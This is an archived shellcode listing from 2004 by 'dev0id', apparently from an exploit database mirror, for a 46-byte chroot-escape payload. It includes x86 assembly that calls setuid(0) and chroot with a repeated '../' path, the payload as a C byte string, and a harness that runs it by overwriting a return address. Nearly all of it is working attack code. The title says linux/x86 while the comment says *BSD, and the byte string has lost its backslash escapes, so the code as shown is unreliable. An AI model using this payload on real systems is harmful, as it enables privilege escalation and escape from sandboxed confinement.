[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 break chroot 46 bytes
# Published : 2004-09-12
# Author : dev0id
# Previous Title : linux/x86 break chroot 34 bytes
# Next Title : linux/x86 execve /bin/sh encrypted 58 bytes
/* The setuid(0)+chroot() shellcode
it will put '../' 10 times
Size 46 bytes
OS *BSD
/rootteam/dev0id (www.sysworld.net)
dev0id@uncompiled.com
BITS 32
jmp short callme
main:
pop esi
mov edi,esi
xor ecx,ecx
push ecx
mov al,0x17
push eax
int 0x80
xor eax,eax
push eax
mov cl,0x1e
mov al,0x2e
repne stosb
pop eax
stosb
mov cl,0x1e
main_loop:
dec cl
inc byte [esi+ecx]
dec cl
loop main_loop
push esi
mov al,0x3d
push eax
int 0x80
callme:
call main
*/
char shellcode[] =
"xebx27x5ex89xf7x31xc9x51xb0x17x50xcdx80x31xc0"
"x50xb1x1exb0x2exf2xaax58xaaxb1x1exfexc9xfex04"
"x0exfexc9xe2xf7x56xb0x3dx50xcdx80xe8xd4xffxff"
"xff";
int
main(void)
{
int *ret;
ret = (int*)&ret + 2;
(*ret) = shellcode;
}
// www.Syue.com [2004-09-12]